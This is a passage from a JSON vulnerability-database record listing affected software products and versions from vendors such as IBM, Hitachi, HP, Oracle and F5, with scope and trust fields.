"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0"
},
{
"_id": null,
"model": "security siteprotector system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "infosphere mashuphub",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.04"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "raplication manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "global link manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11-07"
},
{
"_id": null,
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"_id": null,
"model": "security siteprotector system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.5"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.01"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"_id": null,
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.6.0"
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "sitescope monitors 11.32ip1",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1.1"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.13"
},
{
"_id": null,
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.11"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.2"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.22"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.1"
},
{
"_id": null,
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1x8664"
},
{
"_id": null,
"model": "infosphere balanced warehouse c3000",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4.1"
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "tivoli composite application manager for application diagnostics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.12"
},
{
"_id": null,
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.11"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "content collector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"_id": null,
"model": "content analytics with enterprise search",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "icewall configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.02"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1.1"
},
{
"_id": null,
"model": "enterprise data quality",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.0.11"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3.1"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "tiered storage manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.51"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"_id": null,
"model": "tuning manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tiered storage manager software -00",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.1"
},
{
"_id": null,
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.1.0"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-03(x64))"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "20500"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "records manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.1"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-03"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.2"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-00(x64))"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.2"
},
{
"_id": null,
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.2"
},
{
"_id": null,
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-10.1"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.3"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1.1"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.2"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "omnifind enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.10"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "57100"
},
{
"_id": null,
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.114"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4.1"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.1"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"_id": null,
"model": "openpages grc platform",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2.1"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-10-03"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"_id": null,
"model": "security identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.5"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "sitescope monitors",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.20"
},
{
"_id": null,
"model": "secure analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.1"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.52"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-02"
},
{
"_id": null,
"model": "content manager records enabler",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "retail invoice matching 12.0in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.4"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "infosphere master data management server for product information",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-02(x64))"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.6"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "rational insight ifix1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.1"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "jboss fuse",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6.1.0"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "websphere partner gateway enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.53"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.34"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1"
},
{
"_id": null,
"model": "global link manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.4"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "5"
},
{
"_id": null,
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.001"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2143"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.12"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.402"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-50"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "real-time decision server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.0"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.37"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.1"
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.21"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "leads",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.6"
},
{
"_id": null,
"model": "sitescope",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "11.24.271"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0-00"
},
{
"_id": null,
"model": "tiered storage manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.1"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"_id": null,
"model": "tivoli provisioning manager for software",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "global link manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3"
},
{
"_id": null,
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.6"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "56002"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.2"
},
{
"_id": null,
"model": "infosphere identity insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
